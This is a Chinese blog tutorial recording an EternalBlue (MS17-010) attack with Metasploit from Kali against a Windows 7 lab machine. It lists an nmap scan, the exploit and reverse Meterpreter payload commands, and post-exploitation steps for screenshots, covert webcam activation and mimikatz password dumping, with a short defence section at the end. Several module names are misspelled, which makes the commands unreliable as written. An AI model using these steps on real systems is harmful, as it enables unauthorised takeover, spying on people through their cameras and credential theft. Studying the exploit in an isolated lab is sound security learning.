kali linux永恆之藍漏洞記錄
註:本教程只用於學習使用,切勿拿去搞破壞,一切法律後果與本人無關
1.攻擊簡介
今天就跟大家分享下剛剛學習到利用MSF框架快速搞定「MS017-010」漏洞。其實我們這裡所說的使用MSF 實現 「永恆之藍」的快速攻擊,就是利用Metasploit中針對ms17-101漏洞的攻擊載荷進行攻擊獲取主機控制許可權。「永恆之藍」的原理主要是掃描所有開放445文件共享埠的Windows機器。
2.工具準備
2.1、kali 2.0機器一台(發起攻擊的主機)
IP:192.168.1.11
2.2、win7系統64位機一台,開啟文件共享(被攻擊的靶機)
IP:192.168.1.12
3.攻擊前需要做的事情
3.1、設置兩台機器為僅主機模式,並讓虛擬編輯器自動分配IP,保證兩台主機互相ping通。
3.2、編輯 kali 更新源
配置kali的更新源:直接編輯更新源的配置文件「/etc/apt/sources.list」 ,然後將下面的源敲進去保存即可。
置完源配置文件後,直接進行更新,具體命令如下。
root@kali:~# apt-get update
3.3、MSF攻擊框架版本要求
MSF框架版本要求在 4.14.17版本以上,具體版本查看方法如下。
3.3.1.終端輸入 msfconsole #進入框架,可能需要30秒左右
3.3.2.輸入version
3.4、安裝更新metasploit(我已經更新過了)
終端輸入:apt-get install metasploit-framework
4.掃描存在漏洞的主機 (注意根據相應的IP網段掃描)
4.1、nmap-n -p445192.168.1.0/24--open
針對本次演示攻擊中的主機發現掃描,個人推薦使用 nmap -n -p445 192.168.1.0/24 --open 其掃描發現的效率最高。
5.ms17-010 漏洞攻擊MSF框架實踐記錄
5.1進入msf框架並確認版本
root@kali:~# msfconsole
msf> version
5.2漏洞模塊路徑查詢
5.3載入掃描模塊 (可用Tab補全)
use auxiliary/scanner/amb/amb_ms17_010
show options
set rhosts 192.168.1.12 (靶機的IP)
exploit
5.4載入攻擊模塊並配置攻擊參數 (可用Tab補全)
use exploit/windows/smb/ms17_010_eternablblue
set payload windows/x64/meterpreter/reverse_top
show options
set rhost 192.168.1.12 (靶機的IP)
set lhost 192.168.1.11 (發起攻擊的主機IP)
set lport 443 (監聽的埠)
5.5發起攻擊,成功會反彈shell
輸入 run 或exploit 發起攻擊
當然,有的機子是不會反彈shell的,因為直接藍屏了~
更多關於meterpreter的操作可查看:
meterpreter會話滲透利用常用的32個命令歸納小結
6.meterpreter 功能展現 (可用Tab補全)
6.1捕捉桌面
meterpreter > screenshot
6.2視屏開啟
meterpreter > webcam_scream
(kali會自動打開瀏覽器播放被攻擊電腦的攝像頭,被攻擊者的攝像頭也會亮起來(會被發現的),本實驗中不穩定不再做記錄)
6.3獲取系統管理密碼
第一步:載入mimikatz
1.meterpreter > load mimikatz
第二步:使用命令wdigest獲取密碼
有關meterpreter 的功能還有很多,這裡就不足做過多的說明了,就是簡單記錄下本次實戰演練過程中遇到的各種問題和小技能有關其他的功能使用可以參考其他文檔做進一步的學習。
7.永恆之藍的防範
7.1如果沒有需要禁用文件共享功能,關閉不常用埠
7.2記得拿張膠布蓋住攝像頭哦
參考學習
https://www.anquanke.com/post/id/86245
https://blog.csdn.net/SKI_12/article/details/77103290?locationNum=3&fps=1
https://blog.csdn.net/SHIGUANGTUJING/article/details/80599730
靜 靜 少 年
願歷盡千帆
歸來仍少年
分享美好的事物給你們看
TAG:程帥帥 |